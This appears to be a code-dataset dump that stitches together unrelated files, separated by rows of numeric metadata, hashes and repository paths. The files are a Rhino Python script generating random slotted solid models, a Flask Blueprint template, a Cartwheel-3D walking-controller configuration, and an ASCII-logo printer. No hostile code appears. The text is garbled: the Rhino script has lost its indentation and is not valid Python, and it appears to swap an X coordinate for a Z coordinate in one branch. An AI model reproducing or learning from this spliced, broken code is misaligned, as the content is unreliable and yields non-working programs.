sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(leftPointX,0,leftPointZ),
Rhino.Geometry.Point3d(rightPointX,0,rightPointZ))
else:
if(lowerBlock):
leftPointX = leftMargin + random.random()*(point2.X-leftMargin)
leftPointZ = leftMargin + random.random()*(point1.Z-leftMargin)
rightPointX = leftPointX + random.random()*(point2.X - leftPointX - 3)
rightPointZ = leftPointZ + random.random()*(point1.Z - leftPointZ - 3)
width = 2.5 + random.random()*(min(leftPointX,point2.X-rightPointX)-2.5)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(leftPointX,0,leftPointZ),
Rhino.Geometry.Point3d(rightPointZ,0,rightPointZ))
perpendicularVector = (1/math.sqrt(sqrDist))*Rhino.Geometry.Vector3d(-1*(rightPointZ-leftPointZ),0,(rightPointX-leftPointX))
points = [Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2,0,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2,0 ,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2,0,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2,0,rightPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2,height,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2,height ,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2,height,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2,height,rightPointZ - perpendicularVector.Z*width/2)]
plane = Rhino.Geometry.Plane(points[0],points[3],points[4])
brepToSubtract = Rhino.Geometry.Box(plane,points).ToBrep()
brepArrayToCheck = [brepBox1,brepBox2,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
if(brepUnion is not None):
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
else:
leftPointX = leftMargin + point1.X + random.random()*(point2.X - point1.X - leftMargin)
leftPointZ = leftMargin + random.random()*(point2.Z - leftMargin)
rightPointX = leftPointX + random.random()*(point2.X - leftPointX -3)
rightPointZ = leftPointZ + random.random()*(point2.Z - leftPointZ -3)
width = 2.5 + random.random()*(min(leftPointX - point1.X, point2.X - rightPointX)-2.5)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(leftPointX,0,leftPointZ),
Rhino.Geometry.Point3d(rightPointX,0,rightPointZ))
perpendicularVector = (1/math.sqrt(sqrDist))*Rhino.Geometry.Vector3d(-1*(rightPointZ-leftPointZ),0,(rightPointX-leftPointX))
points = [Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2,0,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2,0 ,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2,0,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2,0,rightPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2,height,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2,height ,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2,height,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2,height,rightPointZ - perpendicularVector.Z*width/2)]
plane = Rhino.Geometry.Plane(points[0],points[3],points[4])
brepToSubtract = Rhino.Geometry.Box(plane,points).ToBrep()
brepArrayToCheck = [brepBox2,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox1.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
lowerBlock = bool(random.randint(0,1))
if(straight):
xAxis = bool(random.randint(0,1))
if(lowerBlock):
leftPointX = leftMargin + random.random()*(point2.X - leftMargin)
leftPointZ = leftMargin + random.random()*(point1.Z - leftMargin)
if(xAxis):
rightPointX = leftPointX + random.random()*(point2.X-leftPointX-3)
rightPointZ = leftPointZ
width = 2.5 + random.random()*(min(leftPointZ,point1.Z-rightPointZ)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX,0,leftPointZ-width/2)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX,height,rightPointZ + width/2)
else:
rightPointX = leftPointX
rightPointZ = leftPointZ + random.random()*(point1.Z - leftPointZ - 3)
width = 2.5 + random.random()*(min(leftPointX,point2.X-leftPointX)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX - width/2,0,leftPointZ)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX + width/2,height,rightPointZ)
brepToSubtract = AddBrepBox(bottomDiagonal,upperDiagonal)
brepArrayToCheck = [brepBox1,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
if(brepUnion is not None):
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
else:
leftPointX = leftMargin + point1.X + random.random()*(point2.X - point1.X -leftMargin)
leftPointZ = leftMargin + random.random()*(point2.Z - leftMargin)
if(xAxis):
rightPointX = leftPointX + random.random()*(point2.X-leftPointX-3)
rightPointZ = leftPointZ
width = 2.5 + random.random()*(min(leftPointZ, point2.Z - rightPointZ )-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX,0,leftPointZ-width/2)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX , height, rightPointZ + width/2)
else:
rightPointX = leftPointX
rightPointZ = leftPointZ + random.random()*(point2.Z - leftPointZ-3)
width = 2.5 + random.random()*(min(leftPointX-point1.X,point2.X-rightPointX)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX - width/2,0,leftPointZ)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX + width/2,height,rightPointZ)
brepToSubtract = AddBrepBox(bottomDiagonal,upperDiagonal)
brepArrayToCheck = [brepBox1,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
if(brepUnion is not None):
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(leftPointX,0,leftPointZ),
Rhino.Geometry.Point3d(rightPointX,0,rightPointZ))
else:
if(lowerBlock):
leftPointX = leftMargin + random.random()*(point2.X-leftMargin)
leftPointZ = leftMargin + random.random()*(point1.Z-leftMargin)
rightPointX = leftPointX + random.random()*(point2.X - leftPointX - 3)
rightPointZ = leftPointZ + random.random()*(point1.Z - leftPointZ - 3)
width = 2.5 + random.random()*(min(leftPointX,point2.X-rightPointX)-2.5)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(leftPointX,0,leftPointZ),
Rhino.Geometry.Point3d(rightPointZ,0,rightPointZ))
perpendicularVector = (1/math.sqrt(sqrDist))*Rhino.Geometry.Vector3d(-1*(rightPointZ-leftPointZ),0,(rightPointX-leftPointX))
points = [Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2,0,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2,0 ,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2,0,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2,0,rightPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2,height,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2,height ,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2,height,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2,height,rightPointZ - perpendicularVector.Z*width/2)]
plane = Rhino.Geometry.Plane(points[0],points[3],points[4])
brepToSubtract = Rhino.Geometry.Box(plane,points).ToBrep()
brepArrayToCheck = [brepBox1,brepBox2,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
if(brepUnion is not None):
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
else:
leftPointX = leftMargin + point1.X + random.random()*(point2.X - point1.X - leftMargin)
leftPointZ = leftMargin + random.random()*(point2.Z - leftMargin)
rightPointX = leftPointX + random.random()*(point2.X - leftPointX -3)
rightPointZ = leftPointZ + random.random()*(point2.Z - leftPointZ -3)
width = 2.5 + random.random()*(min(leftPointX - point1.X, point2.X - rightPointX)-2.5)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(leftPointX,0,leftPointZ),
Rhino.Geometry.Point3d(rightPointX,0,rightPointZ))
perpendicularVector = (1/math.sqrt(sqrDist))*Rhino.Geometry.Vector3d(-1*(rightPointZ-leftPointZ),0,(rightPointX-leftPointX))
points = [Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2,0,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2,0 ,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2,0,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2,0,rightPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2,height,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2,height ,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2,height,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2,height,rightPointZ - perpendicularVector.Z*width/2)]
plane = Rhino.Geometry.Plane(points[0],points[3],points[4])
brepToSubtract = Rhino.Geometry.Box(plane,points).ToBrep()
brepArrayToCheck = [brepBox2,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox1.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
brepSubtractArray = [brepToSubtract]
check,curves,points = Rhino.Geometry.Intersect.Intersection.BrepBrep(brepToSubtract,brepFillet,tolerance)
brepBoxUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArray,tolerance)
brepAddArray = [brepBoxUnion[0]]
if(len(curves)== 0):
brepSubtractArray.append(brepFillet)
brepModel = Rhino.Geometry.Brep.CreateBooleanDifference(brepAddArray,brepSubtractArray,tolerance)
totalVolume = brepBox1.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
if ( brepModel is not None and width > 4 and sqrDist > 16 and brepTotalVolume <= totalVolume):
for brep in brepModel:
if(scriptcontext.doc.Objects.AddBrep(brep) != System.Guid.Empty ):
scriptcontext.doc.Views.Redraw()
#rs.Command("_-SaveAs"+" F:\ModuleWorks\RhinoNoHoleIGS\\" + str(modelIdx) + ".igs" + " enter" + " enter",True)
objs = rs.AllObjects(select = True)
#rs.Command("_Delete ")
filled = True
if(filled):
return 1
else:
return 0
if __name__ == "__main__":
    # Keep generating until 20 models have been produced successfully:
    # the generator returns 1 on success and 0 on failure, so a failed
    # attempt simply retries without advancing the count.
    generated = 0
    while generated < 20:
        generated += GenerateSlotsForSteppedModel()
| 79.047297
| 169
| 0.6445
| 4,552
| 46,796
| 6.623462
| 0.030756
| 0.121161
| 0.112769
| 0.048292
| 0.941061
| 0.93466
| 0.926401
| 0.915755
| 0.889884
| 0.880066
| 0
| 0.036917
| 0.242286
| 46,796
| 592
| 170
| 79.047297
| 0.813385
| 0.003334
| 0
| 0.717993
| 0
| 0
| 0.000172
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00692
| false
| 0
| 0.015571
| 0
| 0.031142
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c525f873d9cb4c5a8a235a7aeead5a11e7a6d4de
| 174
|
py
|
Python
|
.idea/fileTemplates/Blueprint Init.py
|
marcoprado17/flask-bone
|
772d25bdf6c6e41701da1ef2e2a67bae7ae21757
|
[
"MIT"
] | null | null | null |
.idea/fileTemplates/Blueprint Init.py
|
marcoprado17/flask-bone
|
772d25bdf6c6e41701da1ef2e2a67bae7ae21757
|
[
"MIT"
] | null | null | null |
.idea/fileTemplates/Blueprint Init.py
|
marcoprado17/flask-bone
|
772d25bdf6c6e41701da1ef2e2a67bae7ae21757
|
[
"MIT"
] | null | null | null |
#parse("header.py")
from flask import Blueprint
${BLUEPRINT_NAME}_blueprint = Blueprint("${BLUEPRINT_NAME}", __name__, static_folder="static", template_folder="templates")
| 29
| 123
| 0.775862
| 20
| 174
| 6.3
| 0.6
| 0.428571
| 0.349206
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074713
| 174
| 5
| 124
| 34.8
| 0.782609
| 0.103448
| 0
| 0
| 0
| 0
| 0.206452
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.5
| null | null | 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
c52a3c803e228cb6d1b29b676b706c92848fc034
| 14,538
|
py
|
Python
|
Cartwheel/cartwheel-3d/Python/Data/Characters/BipV3/Controllers/Walking.py
|
MontyThibault/centre-of-mass-awareness
|
58778f148e65749e1dfc443043e9fc054ca3ff4d
|
[
"MIT"
] | null | null | null |
Cartwheel/cartwheel-3d/Python/Data/Characters/BipV3/Controllers/Walking.py
|
MontyThibault/centre-of-mass-awareness
|
58778f148e65749e1dfc443043e9fc054ca3ff4d
|
[
"MIT"
] | null | null | null |
Cartwheel/cartwheel-3d/Python/Data/Characters/BipV3/Controllers/Walking.py
|
MontyThibault/centre-of-mass-awareness
|
58778f148e65749e1dfc443043e9fc054ca3ff4d
|
[
"MIT"
] | null | null | null |
from App.Proxys import *
data = IKVMCController(
name = '',
controlParamsList = [
ControlParams( joint = 'root', kp = 1000.0, kd = 200.0, tauMax = 200.0, scale = ( 1.0, 1.0, 1.0 ) ),
ControlParams( joint = 'pelvis_lowerback', kp = 75.0, kd = 17.0, tauMax = 100.0, scale = ( 1.0, 1.0, 1.0 ) ),
ControlParams( joint = 'lowerback_torso', kp = 75.0, kd = 17.0, tauMax = 100.0, scale = ( 1.0, 1.0, 1.0 ) ),
ControlParams( joint = 'torso_head', kp = 10.0, kd = 3.0, tauMax = 200.0, scale = ( 1.0, 0.2, 1.0 ) ),
ControlParams( joint = 'lShoulder', kp = 15.0, kd = 5.0, tauMax = 200.0, scale = ( 0.5, 1.0, 1.0 ) ),
ControlParams( joint = 'rShoulder', kp = 15.0, kd = 5.0, tauMax = 200.0, scale = ( 0.3, 1.0, 1.0 ) ),
ControlParams( joint = 'lElbow', kp = 5.0, kd = 1.0, tauMax = 200.0, scale = ( 0.2, 1.0, 1.0 ) ),
ControlParams( joint = 'rElbow', kp = 5.0, kd = 1.0, tauMax = 200.0, scale = ( 0.2, 1.0, 1.0 ) ),
ControlParams( joint = 'lHip', kp = 300.0, kd = 35.0, tauMax = 200.0, scale = ( 1.0, 1.0, 1.0 ) ),
ControlParams( joint = 'rHip', kp = 300.0, kd = 35.0, tauMax = 200.0, scale = ( 1.0, 1.0, 1.0 ) ),
ControlParams( joint = 'lKnee', kp = 300.0, kd = 35.0, tauMax = 1000.0, scale = ( 1.0, 1.0, 1.0 ) ),
ControlParams( joint = 'rKnee', kp = 300.0, kd = 35.0, tauMax = 1000.0, scale = ( 1.0, 1.0, 1.0 ) ),
ControlParams( joint = 'lAnkle', kp = 50.0, kd = 15.0, tauMax = 100.0, scale = ( 1.0, 0.2, 0.2 ) ),
ControlParams( joint = 'rAnkle', kp = 50.0, kd = 15.0, tauMax = 100.0, scale = ( 1.0, 0.2, 0.2 ) ),
ControlParams( joint = 'lToeJoint', kp = 2.0, kd = 0.2, tauMax = 100.0, scale = ( 1.0, 1.0, 1.0 ) ),
ControlParams( joint = 'rToeJoint', kp = 2.0, kd = 0.2, tauMax = 100.0, scale = ( 1.0, 1.0, 1.0 ) ) ],
states = [
SimBiConState(
name = 'State 0',
nextStateIndex = 0,
duration = 0.6,
externalForces = [ ],
trajectories = [
Trajectory(
joint = 'root',
strength = [ ],
components = [
TrajectoryComponent(
rotationAxis = ( 0.0, 1.0, 0.0 ),
reverseOnStance = 'RIGHT',
baseTrajectory = [ ( 1.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ),
TrajectoryComponent(
rotationAxis = ( 0.0, 0.0, 1.0 ),
reverseOnStance = 'RIGHT',
baseTrajectory = [ ( 1.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ),
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] ),
Trajectory( joint = 'SWING_Hip', strength = [ ( 0.2, 0.2 ), ( 0.4, 1.0 ) ], components = [ ] ),
Trajectory(
joint = 'SWING_Knee',
strength = [ ( 0.2, 0.2 ), ( 0.4, 1.0 ) ],
components = [
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] ),
Trajectory(
joint = 'STANCE_Knee',
strength = [ ],
components = [
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.003344, 0.204846 ), ( 0.959866, 0.070153 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] ),
Trajectory(
joint = 'SWING_Ankle',
strength = [ ( 0.2, 0.2 ), ( 0.4, 1.0 ) ],
referenceFrame = 'CHARACTER_RELATIVE',
components = [
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.0, 0.3 ), ( 0.3, 0.3 ), ( 0.4, 0.0 ), ( 1.0, -0.3 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [
( -0.5, 2.0 ),
( -0.1, 1.0 ),
( 0.0, 0.0 ),
( 0.1, 1.0 ),
( 0.5, 2.5 ),
( 1.0, 6.0 ),
( 1.1, 7.0 ),
( 1.5, 3.0 ) ] ),
TrajectoryComponent(
rotationAxis = ( 0.0, 0.0, 1.0 ),
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] ),
Trajectory(
joint = 'STANCE_Ankle',
strength = [ ( 0.3, 1.0 ) ],
referenceFrame = 'CHARACTER_RELATIVE',
components = [
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.0, -0.1 ), ( 0.3, 0.0 ), ( 0.8, 0.0 ), ( 1.0, 0.2 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ( -0.1, 0.5 ), ( 0.0, 0.0 ), ( 0.2, 0.2 ), ( 0.5, 0.2 ), ( 1.0, 2.5 ) ] ),
TrajectoryComponent(
rotationAxis = ( 0.0, 0.0, 1.0 ),
reverseOnStance = 'LEFT',
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] ),
Trajectory(
joint = 'SWING_Shoulder',
strength = [ ],
components = [
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.0, 0.2 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ),
TrajectoryComponent(
rotationAxis = ( 0.0, 0.0, 1.0 ),
reverseOnStance = 'LEFT',
baseTrajectory = [ ( 0.0, -1.57 ), ( 0.752508, -1.473995 ), ( 0.979933, -1.308908 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ),
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
feedback = LinearBalanceFeedback( axis = ( 0.0, 0.0, 1.0 ), cv = 0.1, vLimits = ( -0.6, 0.6 ) ),
baseTrajectory = [ ( 0.0, 0.143195 ), ( 0.558653, 0.193845 ), ( 0.813333, 0.16319 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] ),
Trajectory(
joint = 'STANCE_Shoulder',
strength = [ ],
components = [
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ),
TrajectoryComponent(
rotationAxis = ( 0.0, 0.0, 1.0 ),
reverseOnStance = 'LEFT',
baseTrajectory = [ ( 0.0, 1.57 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ),
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
feedback = LinearBalanceFeedback( axis = ( 0.0, 0.0, 1.0 ), cv = -0.1, vLimits = ( -0.6, 0.6 ) ),
baseTrajectory = [ ( 0.0, -0.2 ), ( 0.842809, -0.176382 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] ),
Trajectory(
joint = 'STANCE_Elbow',
strength = [ ],
components = [
TrajectoryComponent(
rotationAxis = ( 0.0, 1.0, 0.0 ),
reverseOnStance = 'LEFT',
baseTrajectory = [ ( 0.0, 0.1 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] ),
Trajectory(
joint = 'SWING_Elbow',
strength = [ ],
components = [
TrajectoryComponent(
rotationAxis = ( 0.0, 1.0, 0.0 ),
reverseOnStance = 'LEFT',
baseTrajectory = [ ( 0.006689, -0.1 ), ( 0.568562, -0.2 ), ( 0.989967, -0.1 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] ),
Trajectory(
joint = 'pelvis_lowerback',
strength = [ ],
referenceFrame = 'CHARACTER_RELATIVE',
components = [
TrajectoryComponent(
rotationAxis = ( 0.0, 1.0, 0.0 ),
reverseOnStance = 'RIGHT',
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ),
TrajectoryComponent(
rotationAxis = ( 0.0, 0.0, 1.0 ),
reverseOnStance = 'RIGHT',
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ),
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.0, 0.0 ), ( 0.5, 0.0 ), ( 0.8, 0.15 ), ( 1.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ( -0.75, -0.5 ), ( 0.0, 0.0 ), ( 0.8, 1.0 ) ] ) ] ),
Trajectory(
joint = 'lowerback_torso',
strength = [ ],
referenceFrame = 'CHARACTER_RELATIVE',
components = [
TrajectoryComponent(
rotationAxis = ( 0.0, 1.0, 0.0 ),
reverseOnStance = 'RIGHT',
baseTrajectory = [ ( 0.0, 0.0 ), ( 0.508361, -0.2 ), ( 1.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ( -0.75, -0.5 ), ( 0.0, 0.1 ), ( 0.5, 0.5 ), ( 1.0, 1.0 ) ] ),
TrajectoryComponent(
rotationAxis = ( 0.0, 0.0, 1.0 ),
reverseOnStance = 'RIGHT',
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ),
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.0, 0.0 ), ( 0.3, 0.0 ), ( 0.75, 0.2 ), ( 1.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ( -0.75, -0.5 ), ( 0.0, 0.0 ), ( 0.8, 1.0 ) ] ) ] ),
Trajectory(
joint = 'torso_head',
strength = [ ],
referenceFrame = 'CHARACTER_RELATIVE',
components = [
TrajectoryComponent(
rotationAxis = ( 0.0, 1.0, 0.0 ),
reverseOnStance = 'RIGHT',
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ),
TrajectoryComponent(
rotationAxis = ( 0.0, 0.0, 1.0 ),
reverseOnStance = 'RIGHT',
baseTrajectory = [ ( 1.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ),
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] ),
Trajectory(
joint = 'SWING_ToeJoint',
strength = [ ( 0.3, 0.1 ), ( 0.5, 0.1 ), ( 0.6, 1.0 ) ],
components = [
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] ),
Trajectory(
joint = 'STANCE_ToeJoint',
strength = [ ],
components = [
TrajectoryComponent(
rotationAxis = ( 1.0, 0.0, 0.0 ),
baseTrajectory = [ ( 0.0, 0.0 ) ],
dScaledTrajectory = [ ],
vScaledTrajectory = [ ] ) ] )
]
)
]
)
| 51.736655
| 125
| 0.347641
| 1,131
| 14,538
| 4.44916
| 0.091954
| 0.084261
| 0.077504
| 0.051669
| 0.870827
| 0.82035
| 0.786963
| 0.781598
| 0.781598
| 0.771264
| 0
| 0.127804
| 0.524763
| 14,538
| 281
| 126
| 51.736655
| 0.600521
| 0
| 0
| 0.707031
| 0
| 0
| 0.03157
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003906
| 0
| 0.003906
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c53e3a14cc972235ec4de18b8690e2b3b1f1100b
| 491
|
py
|
Python
|
redlist/logo.py
|
Ramenseller/RedList
|
e7fb3d351af350c18421370a3423af42e857a450
|
[
"MIT"
] | 2
|
2018-05-03T04:47:56.000Z
|
2018-05-17T03:54:48.000Z
|
redlist/logo.py
|
Ramenseller/B4_OS18
|
e7fb3d351af350c18421370a3423af42e857a450
|
[
"MIT"
] | 37
|
2018-05-16T14:18:46.000Z
|
2018-05-29T15:01:33.000Z
|
redlist/logo.py
|
Ramenseller/RedList
|
e7fb3d351af350c18421370a3423af42e857a450
|
[
"MIT"
] | 5
|
2018-05-03T04:35:05.000Z
|
2018-05-14T11:47:42.000Z
|
# -*- coding: utf-8 -*-
from colorama import Fore
def print_logo():
    r"""Print the RedList ASCII-art logo in red, followed by the credits.

        ___         __   __   _     __
       / _ \___ ___/ /  / /  (_)__ / /_
      / , _/ -_) _  /  / /__/ (_-</ __/
     /_/|_|\__/\_,_/  /____/_/___/\__/

            by Team Avengers
            MIT LICENSE
            VERSION
    """
    # Fix: the art contains backslash sequences such as "\_" that are invalid
    # string escapes; they only worked because CPython currently preserves
    # unknown escapes (with a DeprecationWarning). Double the backslashes so
    # the literals are valid while the printed output stays byte-identical.
    print(Fore.RED + " ___ __ __ _ __ \n / _ \\___ ___/ / / / (_)__ / /_\n / , _/ -_) _ / / /__/ (_-</ __/\n/_/|_|\\__/\\_,_/ /____/_/___/\\__/ \n")
    # Fore.RESET restores the terminal's default colour after the red logo.
